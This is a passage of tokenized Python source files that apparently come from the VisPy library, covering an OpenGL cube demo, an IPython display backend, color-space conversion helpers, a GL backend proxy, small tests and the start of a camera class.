"<STR_LIT>" ) <EOL> gl . glEnableVertexAttribArray ( loc ) <EOL> gl . glVertexAttribPointer ( loc , <NUM_LIT:3> , gl . GL_FLOAT , False , stride , offset ) <EOL> offset = vcube_data . dtype [ "<STR_LIT>" ] . itemsize <EOL> loc = gl . glGetAttribLocation ( self . cube , "<STR_LIT>" ) <EOL> gl . glEnableVertexAttribArray ( loc ) <EOL> gl . glVertexAttribPointer ( loc , <NUM_LIT:2> , gl . GL_FLOAT , False , stride , offset ) <EOL> crate = checkerboard ( ) <EOL> texture = gl . glCreateTexture ( ) <EOL> gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_MIN_FILTER , <EOL> gl . GL_LINEAR ) <EOL> gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_MAG_FILTER , <EOL> gl . GL_LINEAR ) <EOL> gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_WRAP_S , <EOL> gl . GL_CLAMP_TO_EDGE ) <EOL> gl . glTexParameterf ( gl . GL_TEXTURE_2D , gl . GL_TEXTURE_WRAP_T , <EOL> gl . GL_CLAMP_TO_EDGE ) <EOL> gl . glTexImage2D ( gl . GL_TEXTURE_2D , <NUM_LIT:0> , gl . GL_LUMINANCE , gl . GL_LUMINANCE , <EOL> gl . GL_UNSIGNED_BYTE , crate . shape [ : <NUM_LIT:2> ] ) <EOL> gl . glTexSubImage2D ( gl . GL_TEXTURE_2D , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , gl . GL_LUMINANCE , <EOL> gl . GL_UNSIGNED_BYTE , crate ) <EOL> loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL> gl . glUniform1i ( loc , texture ) <EOL> gl . glBindTexture ( gl . GL_TEXTURE_2D , <NUM_LIT:0> ) <EOL> view = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL> model = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL> projection = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL> translate ( view , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:7> ) <EOL> self . phi , self . theta = <NUM_LIT> , <NUM_LIT:20> <EOL> rotate ( model , self . theta , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> rotate ( model , self . phi , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL> gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , model ) <EOL> loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL> gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , view ) <EOL> loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL> gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , projection ) <EOL> gl . glClearColor ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> gl . glEnable ( gl . GL_DEPTH_TEST ) <EOL> self . _resize ( * ( self . size + self . physical_size ) ) <EOL> self . timer = app . Timer ( '<STR_LIT>' , self . on_timer , start = True ) <EOL> def on_draw ( self , event ) : <EOL> gl . glClear ( gl . GL_COLOR_BUFFER_BIT | gl . GL_DEPTH_BUFFER_BIT ) <EOL> gl . glDrawElements ( gl . GL_TRIANGLES , self . icube_data . size , <EOL> gl . GL_UNSIGNED_INT , None ) <EOL> def on_resize ( self , event ) : <EOL> self . _resize ( * ( event . size + event . physical_size ) ) <EOL> def _resize ( self , width , height , physical_width , physical_height ) : <EOL> gl . glViewport ( <NUM_LIT:0> , <NUM_LIT:0> , physical_width , physical_height ) <EOL> projection = perspective ( <NUM_LIT> , width / float ( height ) , <NUM_LIT> , <NUM_LIT> ) <EOL> loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL> gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , projection ) <EOL> def on_timer ( self , event ) : <EOL> self . theta += <NUM_LIT> <EOL> self . phi += <NUM_LIT> <EOL> model = np . eye ( <NUM_LIT:4> , dtype = np . float32 ) <EOL> rotate ( model , self . theta , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> rotate ( model , self . phi , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> loc = gl . glGetUniformLocation ( self . cube , "<STR_LIT>" ) <EOL> gl . glUniformMatrix4fv ( loc , <NUM_LIT:1> , False , model ) <EOL> self . update ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> c = Canvas ( ) <EOL> c . show ( ) <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from . . base import BaseApplicationBackend , BaseCanvasBackend <EOL> from . . import Application , Canvas <EOL> from ... util import logger <EOL> from ... gloo . util import _screenshot <EOL> from ... io import _make_png <EOL> from base64 import b64encode <EOL> capability = dict ( <EOL> title = True , <EOL> size = True , <EOL> position = True , <EOL> show = True , <EOL> vsync = False , <EOL> resizable = True , <EOL> decorate = False , <EOL> fullscreen = False , <EOL> context = True , <EOL> multi_window = True , <EOL> scroll = True , <EOL> parent = False , <EOL> always_on_top = False , <EOL> ) <EOL> def _set_config ( c ) : <EOL> _app . backend_module . _set_config ( c ) <EOL> try : <EOL> _app = Application ( '<STR_LIT:default>' ) <EOL> except Exception : <EOL> _msg = '<STR_LIT>' <EOL> available , testable , why_not , which = False , False , _msg , None <EOL> else : <EOL> try : <EOL> from IPython . display import display_png <EOL> except Exception as exp : <EOL> available , testable , why_not , which = False , False , str ( exp ) , None <EOL> else : <EOL> available , testable , why_not = True , False , None <EOL> which = _app . backend_module . which <EOL> KEYMAP = _app . backend_module . KEYMAP <EOL> class ApplicationBackend ( BaseApplicationBackend ) : <EOL> def __init__ ( self ) : <EOL> BaseApplicationBackend . __init__ ( self ) <EOL> self . _backend2 = _app . _backend <EOL> def _vispy_get_backend_name ( self ) : <EOL> realname = self . _backend2 . _vispy_get_backend_name ( ) <EOL> return '<STR_LIT>' % realname <EOL> def _vispy_process_events ( self ) : <EOL> return self . _backend2 . _vispy_process_events ( ) <EOL> def _vispy_run ( self ) : <EOL> pass <EOL> def _vispy_quit ( self ) : <EOL> return self . _backend2 . _vispy_quit ( ) <EOL> def _vispy_get_native_app ( self ) : <EOL> return self . _backend2 . _vispy_get_native_app ( ) <EOL> class CanvasBackend ( BaseCanvasBackend ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> BaseCanvasBackend . __init__ ( self , * args ) <EOL> self . _initialized = False <EOL> if not kwargs [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if kwargs [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if kwargs [ '<STR_LIT>' ] : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> canvas = Canvas ( app = _app , ** kwargs ) <EOL> self . _backend2 = canvas . native <EOL> canvas . events . draw . connect ( self . _on_draw ) <EOL> canvas . events . resize . connect ( self . _on_resize ) <EOL> canvas . show ( ) <EOL> self . _im = "<STR_LIT>" <EOL> def _vispy_warmup ( self ) : <EOL> return self . _backend2 . _vispy_warmup ( ) <EOL> def _vispy_set_current ( self ) : <EOL> return self . _backend2 . _vispy_set_current ( ) <EOL> def _vispy_swap_buffers ( self ) : <EOL> return self . _backend2 . _vispy_swap_buffers ( ) <EOL> def _vispy_set_title ( self , title ) : <EOL> return self . _backend2 . _vispy_set_title ( title ) <EOL> def _vispy_set_size ( self , w , h ) : <EOL> return self . _backend2 . _vispy_set_size ( w , h ) <EOL> def _vispy_set_position ( self , x , y ) : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> def _vispy_set_visible ( self , visible ) : <EOL> if not visible : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> else : <EOL> self . _vispy_update ( ) <EOL> self . _vispy_canvas . app . process_events ( ) <EOL> self . _vispy_close ( ) <EOL> display_png ( self . _im , raw = True ) <EOL> def _vispy_update ( self ) : <EOL> return self . _backend2 . _vispy_update ( ) <EOL> def _vispy_close ( self ) : <EOL> return self . _backend2 . _vispy_close ( ) <EOL> def _vispy_get_position ( self ) : <EOL> return <NUM_LIT:0> , <NUM_LIT:0> <EOL> def _vispy_get_size ( self ) : <EOL> return self . _backend2 . _vispy_get_size ( ) <EOL> def _on_resize ( self , event = None ) : <EOL> if self . _vispy_canvas is None : <EOL> return <EOL> size = self . _backend2 . _vispy_get_size ( ) <EOL> self . _vispy_canvas . events . resize ( size = size ) <EOL> def _on_draw ( self , event = None ) : <EOL> if self . _vispy_canvas is None : <EOL> return <EOL> if not self . _initialized : <EOL> self . _initialized = True <EOL> self . _vispy_canvas . events . initialize ( ) <EOL> self . _on_resize ( ) <EOL> self . _vispy_canvas . set_current ( ) <EOL> self . _vispy_canvas . events . draw ( region = None ) <EOL> self . _gen_png ( ) <EOL> def _gen_png ( self ) : <EOL> screenshot = _screenshot ( ) <EOL> png = _make_png ( screenshot ) <EOL> self . _im = b64encode ( png ) </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> from . . ext . six import string_types <EOL> def _check_color_dim ( val ) : <EOL> """<STR_LIT>""" <EOL> val = np . atleast_2d ( val ) <EOL> if val . shape [ <NUM_LIT:1> ] not in ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return val , val . shape [ <NUM_LIT:1> ] <EOL> def _hex_to_rgba ( hexs ) : <EOL> """<STR_LIT>""" <EOL> hexs = np . atleast_1d ( np . array ( hexs , '<STR_LIT>' ) ) <EOL> out = np . ones ( ( len ( hexs ) , <NUM_LIT:4> ) , np . float32 ) <EOL> for hi , h in enumerate ( hexs ) : <EOL> assert isinstance ( h , string_types ) <EOL> off = <NUM_LIT:1> if h [ <NUM_LIT:0> ] == '<STR_LIT:#>' else <NUM_LIT:0> <EOL> assert len ( h ) in ( <NUM_LIT:6> + off , <NUM_LIT:8> + off ) <EOL> e = ( len ( h ) - off ) // <NUM_LIT:2> <EOL> out [ hi , : e ] = [ int ( h [ i : i + <NUM_LIT:2> ] , <NUM_LIT:16> ) / <NUM_LIT> <EOL> for i in range ( off , len ( h ) , <NUM_LIT:2> ) ] <EOL> return out <EOL> def _rgb_to_hex ( rgbs ) : <EOL> """<STR_LIT>""" <EOL> rgbs , n_dim = _check_color_dim ( rgbs ) <EOL> return np . array ( [ '<STR_LIT>' % tuple ( ( <NUM_LIT:255> * rgb [ : <NUM_LIT:3> ] ) . astype ( np . uint8 ) ) <EOL> for rgb in rgbs ] , '<STR_LIT>' ) <EOL> def _rgb_to_hsv ( rgbs ) : <EOL> """<STR_LIT>""" <EOL> rgbs , n_dim = _check_color_dim ( rgbs ) <EOL> hsvs = list ( ) <EOL> for rgb in rgbs : <EOL> rgb = rgb [ : <NUM_LIT:3> ] <EOL> idx = np . argmax ( rgb ) <EOL> val = rgb [ idx ] <EOL> c = val - np . min ( rgb ) <EOL> if c == <NUM_LIT:0> : <EOL> hue = <NUM_LIT:0> <EOL> sat = <NUM_LIT:0> <EOL> else : <EOL> if idx == <NUM_LIT:0> : <EOL> hue = ( ( rgb [ <NUM_LIT:1> ] - rgb [ <NUM_LIT:2> ] ) / c ) % <NUM_LIT:6> <EOL> elif idx == <NUM_LIT:1> : <EOL> hue = ( rgb [ <NUM_LIT:2> ] - rgb [ <NUM_LIT:0> ] ) / c + <NUM_LIT:2> <EOL> else : <EOL> hue = ( rgb [ <NUM_LIT:0> ] - rgb [ <NUM_LIT:1> ] ) / c + <NUM_LIT:4> <EOL> hue *= <NUM_LIT> <EOL> sat = c / val <EOL> hsv = [ hue , sat , val ] <EOL> hsvs . append ( hsv ) <EOL> hsvs = np . array ( hsvs , dtype = np . float32 ) <EOL> if n_dim == <NUM_LIT:4> : <EOL> hsvs = np . concatenate ( ( hsvs , rgbs [ : , <NUM_LIT:3> ] ) , axis = <NUM_LIT:1> ) <EOL> return hsvs <EOL> def _hsv_to_rgb ( hsvs ) : <EOL> """<STR_LIT>""" <EOL> hsvs , n_dim = _check_color_dim ( hsvs ) <EOL> rgbs = list ( ) <EOL> for hsv in hsvs : <EOL> c = hsv [ <NUM_LIT:1> ] * hsv [ <NUM_LIT:2> ] <EOL> m = hsv [ <NUM_LIT:2> ] - c <EOL> hp = hsv [ <NUM_LIT:0> ] / <NUM_LIT> <EOL> x = c * ( <NUM_LIT:1> - abs ( hp % <NUM_LIT:2> - <NUM_LIT:1> ) ) <EOL> if <NUM_LIT:0> <= hp < <NUM_LIT:1> : <EOL> r , g , b = c , x , <NUM_LIT:0> <EOL> elif hp < <NUM_LIT:2> : <EOL> r , g , b = x , c , <NUM_LIT:0> <EOL> elif hp < <NUM_LIT:3> : <EOL> r , g , b = <NUM_LIT:0> , c , x <EOL> elif hp < <NUM_LIT:4> : <EOL> r , g , b = <NUM_LIT:0> , x , c <EOL> elif hp < <NUM_LIT:5> : <EOL> r , g , b = x , <NUM_LIT:0> , c <EOL> else : <EOL> r , g , b = c , <NUM_LIT:0> , x <EOL> rgb = [ r + m , g + m , b + m ] <EOL> rgbs . append ( rgb ) <EOL> rgbs = np . array ( rgbs , dtype = np . float32 ) <EOL> if n_dim == <NUM_LIT:4> : <EOL> rgbs = np . concatenate ( ( rgbs , hsvs [ : , <NUM_LIT:3> ] ) , axis = <NUM_LIT:1> ) <EOL> return rgbs <EOL> _rgb2xyz_norm = np . array ( [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> _xyz2rgb_norm = np . array ( [ [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> def _rgb_to_lab ( rgbs ) : <EOL> rgbs , n_dim = _check_color_dim ( rgbs ) <EOL> xyz = rgbs [ : , : <NUM_LIT:3> ] . copy ( ) <EOL> over = xyz > <NUM_LIT> <EOL> xyz [ over ] = ( ( xyz [ over ] + <NUM_LIT> ) / <NUM_LIT> ) ** <NUM_LIT> <EOL> xyz [ ~ over ] /= <NUM_LIT> <EOL> xyz = np . dot ( xyz , _rgb2xyz_norm ) <EOL> over = xyz > <NUM_LIT> <EOL> xyz [ over ] = xyz [ over ] ** ( <NUM_LIT:1.> / <NUM_LIT> ) <EOL> xyz [ ~ over ] = <NUM_LIT> * xyz [ ~ over ] + <NUM_LIT> <EOL> L = ( <NUM_LIT> * xyz [ : , <NUM_LIT:1> ] ) - <NUM_LIT:16> <EOL> a = <NUM_LIT> * ( xyz [ : , <NUM_LIT:0> ] - xyz [ : , <NUM_LIT:1> ] ) <EOL> b = <NUM_LIT:200> * ( xyz [ : , <NUM_LIT:1> ] - xyz [ : , <NUM_LIT:2> ] ) <EOL> labs = [ L , a , b ] <EOL> if n_dim == <NUM_LIT:4> : <EOL> labs . append ( np . atleast1d ( rgbs [ : , <NUM_LIT:3> ] ) ) <EOL> labs = np . array ( labs , order = '<STR_LIT:F>' ) . T <EOL> return labs <EOL> def _lab_to_rgb ( labs ) : <EOL> """<STR_LIT>""" <EOL> labs , n_dim = _check_color_dim ( labs ) <EOL> y = ( labs [ : , <NUM_LIT:0> ] + <NUM_LIT> ) / <NUM_LIT> <EOL> x = ( labs [ : , <NUM_LIT:1> ] / <NUM_LIT> ) + y <EOL> z = y - ( labs [ : , <NUM_LIT:2> ] / <NUM_LIT> ) <EOL> xyz = np . concatenate ( ( [ x ] , [ y ] , [ z ] ) ) <EOL> over = xyz > <NUM_LIT> <EOL> xyz [ over ] = xyz [ over ] ** <NUM_LIT> <EOL> xyz [ ~ over ] = ( xyz [ ~ over ] - <NUM_LIT> ) / <NUM_LIT> <EOL> rgbs = np . dot ( _xyz2rgb_norm , xyz ) . T <EOL> over = rgbs > <NUM_LIT> <EOL> rgbs [ over ] = <NUM_LIT> * ( rgbs [ over ] ** ( <NUM_LIT:1.> / <NUM_LIT> ) ) - <NUM_LIT> <EOL> rgbs [ ~ over ] *= <NUM_LIT> <EOL> if n_dim == <NUM_LIT:4> : <EOL> rgbs = np . concatenate ( ( rgbs , labs [ : , <NUM_LIT:3> ] ) , axis = <NUM_LIT:1> ) <EOL> rgbs = np . clip ( rgbs , <NUM_LIT:0.> , <NUM_LIT:1.> ) <EOL> return rgbs </s>
<s> from sys import version_info <EOL> if version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> from collections import OrderedDict <EOL> else : <EOL> from . _bundled . ordereddict import OrderedDict </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import os <EOL> from ... util import config , logger <EOL> from . _constants import * <EOL> from . _proxy import BaseGLProxy <EOL> current_backend = None <EOL> class MainProxy ( BaseGLProxy ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , funcname , returns , * args ) : <EOL> func = getattr ( current_backend , funcname ) <EOL> return func ( * args ) <EOL> class DebugProxy ( BaseGLProxy ) : <EOL> """<STR_LIT>""" <EOL> def _arg_repr ( self , arg ) : <EOL> """<STR_LIT>""" <EOL> r = repr ( arg ) <EOL> max = <NUM_LIT> <EOL> if len ( r ) > max : <EOL> if hasattr ( arg , '<STR_LIT>' ) : <EOL> r = '<STR_LIT>' + '<STR_LIT:x>' . join ( [ repr ( s ) for s in arg . shape ] ) <EOL> else : <EOL> r = r [ : max - <NUM_LIT:3> ] + '<STR_LIT>' <EOL> return r <EOL> def __call__ ( self , funcname , returns , * args ) : <EOL> if funcname == '<STR_LIT>' : <EOL> func = getattr ( current_backend , funcname ) <EOL> return func ( ) <EOL> argstr = '<STR_LIT:U+002CU+0020>' . join ( map ( self . _arg_repr , args ) ) <EOL> logger . debug ( "<STR_LIT>" % ( funcname , argstr ) ) <EOL> func = getattr ( current_backend , funcname ) <EOL> ret = func ( * args ) <EOL> if returns : <EOL> logger . debug ( "<STR_LIT>" % repr ( ret ) ) <EOL> check_error ( funcname ) <EOL> return ret <EOL> proxy = MainProxy ( ) <EOL> _debug_proxy = DebugProxy ( ) <EOL> def use_gl ( target = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> target = target or '<STR_LIT>' <EOL> target = target . replace ( '<STR_LIT:+>' , '<STR_LIT>' ) <EOL> target , _ , options = target . partition ( '<STR_LIT:U+0020>' ) <EOL> debug = config [ '<STR_LIT>' ] or '<STR_LIT>' in options <EOL> try : <EOL> mod = __import__ ( target , globals ( ) , level = <NUM_LIT:1> ) <EOL> except ImportError as err : <EOL> msg = '<STR_LIT>' % ( target , str ( err ) ) <EOL> raise RuntimeError ( msg ) <EOL> global current_backend <EOL> current_backend = mod <EOL> _clear_namespace ( ) <EOL> if '<STR_LIT>' in target : <EOL> _copy_gl_functions ( mod . _pyopengl2 , globals ( ) ) <EOL> _copy_gl_functions ( mod , globals ( ) , True ) <EOL> elif debug : <EOL> _copy_gl_functions ( _debug_proxy , globals ( ) ) <EOL> else : <EOL> _copy_gl_functions ( mod , globals ( ) ) <EOL> def _clear_namespace ( ) : <EOL> """<STR_LIT>""" <EOL> ok_names = set ( default_backend . __dict__ ) <EOL> ok_names . update ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> NS = globals ( ) <EOL> for name in list ( NS . keys ( ) ) : <EOL> if name . lower ( ) . startswith ( '<STR_LIT>' ) : <EOL> if name not in ok_names : <EOL> del NS [ name ] <EOL> def _copy_gl_functions ( source , dest , constants = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( source , BaseGLProxy ) : <EOL> s = { } <EOL> for key in dir ( source ) : <EOL> s [ key ] = getattr ( source , key ) <EOL> source = s <EOL> elif not isinstance ( source , dict ) : <EOL> source = source . __dict__ <EOL> if not isinstance ( dest , dict ) : <EOL> dest = dest . __dict__ <EOL> funcnames = [ name for name in source . keys ( ) if name . startswith ( '<STR_LIT>' ) ] <EOL> for name in funcnames : <EOL> dest [ name ] = source [ name ] <EOL> if constants : <EOL> constnames = [ name for name in source . keys ( ) if name . startswith ( '<STR_LIT>' ) ] <EOL> for name in constnames : <EOL> dest [ name ] = source [ name ] <EOL> def check_error ( when = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> while True : <EOL> err = glGetError ( ) <EOL> if err == GL_NO_ERROR or ( errors and err == errors [ - <NUM_LIT:1> ] ) : <EOL> break <EOL> errors . append ( err ) <EOL> if errors : <EOL> msg = '<STR_LIT:U+002CU+0020>' . join ( [ repr ( ENUM_MAP . get ( e , e ) ) for e in errors ] ) <EOL> err = RuntimeError ( '<STR_LIT>' % ( when , msg ) ) <EOL> err . errors = errors <EOL> err . err = errors [ - <NUM_LIT:1> ] <EOL> raise err <EOL> def _fix_osmesa_gl_lib_if_testing ( ) : <EOL> """<STR_LIT>""" <EOL> test_name = os . getenv ( '<STR_LIT>' , None ) <EOL> if test_name == '<STR_LIT>' : <EOL> from ... util . osmesa_gl import fix_osmesa_gl_lib <EOL> fix_osmesa_gl_lib ( ) <EOL> _fix_osmesa_gl_lib_if_testing ( ) <EOL> from . import gl2 as default_backend <EOL> use_gl ( ) </s>
<s> from vispy . gloo import util <EOL> from vispy . testing import run_tests_if_main , assert_raises <EOL> def test_check_enum ( ) : <EOL> from vispy . gloo import gl <EOL> assert util . check_enum ( gl . GL_RGB ) == '<STR_LIT>' <EOL> assert util . check_enum ( gl . GL_TRIANGLE_STRIP ) == '<STR_LIT>' <EOL> assert util . check_enum ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert util . check_enum ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert_raises ( ValueError , util . check_enum , int ( gl . GL_RGB ) ) <EOL> assert_raises ( ValueError , util . check_enum , int ( gl . GL_TRIANGLE_STRIP ) ) <EOL> assert_raises ( ValueError , util . check_enum , [ ] ) <EOL> util . check_enum ( '<STR_LIT>' , '<STR_LIT:test>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' <EOL> util . check_enum ( gl . GL_ALPHA , '<STR_LIT:test>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' <EOL> assert_raises ( ValueError , util . check_enum , '<STR_LIT>' , '<STR_LIT:test>' , ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ) <EOL> assert_raises ( ValueError , util . check_enum , gl . GL_ALPHA , '<STR_LIT:test>' , ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ) <EOL> try : <EOL> from OpenGL import GL <EOL> except ImportError : <EOL> return <EOL> assert util . check_enum ( GL . GL_RGB ) == '<STR_LIT>' <EOL> assert util . check_enum ( GL . GL_TRIANGLE_STRIP ) == '<STR_LIT>' <EOL> def test_check_identifier ( ) : <EOL> assert util . check_identifier ( '<STR_LIT:foo>' ) is None <EOL> assert util . check_identifier ( '<STR_LIT>' ) is None <EOL> assert util . check_identifier ( '<STR_LIT>' ) is None <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_identifier ( '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> assert util . check_variable ( '<STR_LIT:foo>' ) is None <EOL> assert util . check_variable ( '<STR_LIT:a>' * <NUM_LIT:30> ) is None <EOL> assert util . check_variable ( '<STR_LIT:a>' * <NUM_LIT:32> ) <EOL> run_tests_if_main ( ) </s>
<s> from __future__ import division <EOL> from ... util import keys <EOL> from . . node import Node <EOL> from ... visuals . transforms import ( STTransform , MatrixTransform , <EOL> NullTransform , TransformCache ) <EOL> class BaseCamera ( Node ) : <EOL> """<STR_LIT>""" <EOL> _state_props = ( ) <EOL> zoom_factor = <NUM_LIT> <EOL> def __init__ ( self , interactive = True , flip = None , up = '<STR_LIT>' , parent = None , <EOL> name = None ) : <EOL> super ( BaseCamera , self ) . __init__ ( parent , name ) <EOL> self . _viewbox = None <EOL> self . _linked_cameras = [ ] <EOL> self . _linked_cameras_no_update = None <EOL> self . transform = NullTransform ( ) <EOL> self . _pre_transform = None <EOL> self . _viewbox_tr = STTransform ( ) <EOL> self . _projection = MatrixTransform ( ) <EOL> self . _transform_cache = TransformCache ( ) <EOL> self . _event_value = None <EOL> self . _resetting = False <EOL> self . _key_events_bound = False <EOL> self . _set_range_args = None <EOL> self . _xlim = None <EOL> self . _ylim = None <EOL> self . _zlim = None <EOL> self . _default_state = None <EOL> self . _fov = <NUM_LIT:0.0> <EOL> self . _center = None <EOL> self . _depth_value = <NUM_LIT> <EOL> self . interactive = bool ( interactive ) <EOL> self . flip = flip if ( flip is not None ) else ( False , False , False ) <EOL> self . up = up <EOL> @ property <EOL> def depth_value ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _depth_value <EOL> @ depth_value . setter <EOL> def depth_value ( self , value ) : <EOL> value = float ( value ) <EOL> if value <= <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _depth_value = value <EOL> self . view_changed ( ) <EOL> def _depth_to_z ( self , depth ) : <EOL> """<STR_LIT>""" <EOL> val = self . depth_value <EOL> return val - depth * <NUM_LIT:2> * val <EOL> def _viewbox_set ( self , viewbox ) : <EOL> """<STR_LIT>""" <EOL> self . _viewbox = viewbox <EOL> viewbox . events . mouse_press . connect ( self . viewbox_mouse_event ) <EOL> viewbox . events . mouse_release . connect ( self . viewbox_mouse_event ) <EOL> viewbox . events . mouse_move . connect ( self . viewbox_mouse_event ) <EOL> viewbox . events . mouse_wheel . connect ( self . viewbox_mouse_event ) <EOL> viewbox . events . resize . connect ( self . viewbox_resize_event ) <EOL> def _viewbox_unset ( self , viewbox ) : <EOL> """<STR_LIT>""" <EOL> self . _viewbox = None <EOL> viewbox . events . mouse_press . disconnect ( self . viewbox_mouse_event ) <EOL> viewbox . events . mouse_release . disconnect ( self . viewbox_mouse_event ) <EOL> viewbox . events . mouse_move . disconnect ( self . viewbox_mouse_event ) <EOL> viewbox . events . mouse_wheel . disconnect ( self . viewbox_mouse_event ) <EOL> viewbox . events . resize . disconnect ( self . viewbox_resize_event ) <EOL> @ property <EOL> def viewbox ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _viewbox <EOL> @ property <EOL> def interactive ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _interactive <EOL> @ interactive . setter <EOL> def interactive ( self , value ) : <EOL> self . _interactive = bool ( value ) <EOL> @ property <EOL> def flip ( self ) : <EOL> return self . _flip <EOL> @ flip . setter <EOL> def flip ( self , value ) : <EOL> if not isinstance ( value , ( list , tuple ) ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if len ( value ) == <NUM_LIT:2> : <EOL> self . _flip = bool ( value [ <NUM_LIT:0> ] ) , bool ( value [ <NUM_LIT:1> ] ) , False <EOL> elif len ( value ) == <NUM_LIT:3> : <EOL> self . _flip = bool ( value [ <NUM_LIT:0> ] ) , bool ( value [ <NUM_LIT:1> ] ) , bool ( value [ <NUM_LIT:2> ] ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _flip_factors = tuple ( [ ( <NUM_LIT:1> - x * <NUM_LIT:2> ) for x in self . _flip ] ) <EOL> self . view_changed ( ) <EOL> @ property <EOL> def up ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _up <EOL> @ up . setter <EOL> def up ( self , value ) : <EOL> value = value . lower ( ) <EOL> value = ( '<STR_LIT:+>' + value ) if value in '<STR_LIT>' else value <EOL> if value not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _up = value <EOL> self . view_changed ( ) <EOL> @ property <EOL> def center ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _center or ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> @ center . setter <EOL> def center ( self , val ) : <EOL> if len ( val ) == <NUM_LIT:2> : <EOL> self . _center = float ( val [ <NUM_LIT:0> ] ) , float ( val [ <NUM_LIT:1> ] ) , <NUM_LIT:0.0> <EOL> elif len ( val ) == <NUM_LIT:3> : <EOL> self . _center = float ( val [ <NUM_LIT:0> ] ) , float ( val [ <NUM_LIT:1> ] ) , float ( val [ <NUM_LIT:2> ] ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . view_changed ( ) <EOL> @ property <EOL> def fov ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _fov <EOL> @ fov . setter <EOL> def fov ( self , fov ) : <EOL> fov = float ( fov ) <EOL> if fov < <NUM_LIT:0> or fov >= <NUM_LIT> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . _fov = fov <EOL> self . view_changed ( ) <EOL> def set_range ( self , x = None , y = None , z = None , margin = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> init = self . _xlim is None <EOL> bounds = [ None , None , None ] <EOL> if x is not None : <EOL> bounds [ <NUM_LIT:0> ] = float ( x [ <NUM_LIT:0> ] ) , float ( x [ <NUM_LIT:1> ] ) <EOL> if y is not None : <EOL> bounds [ 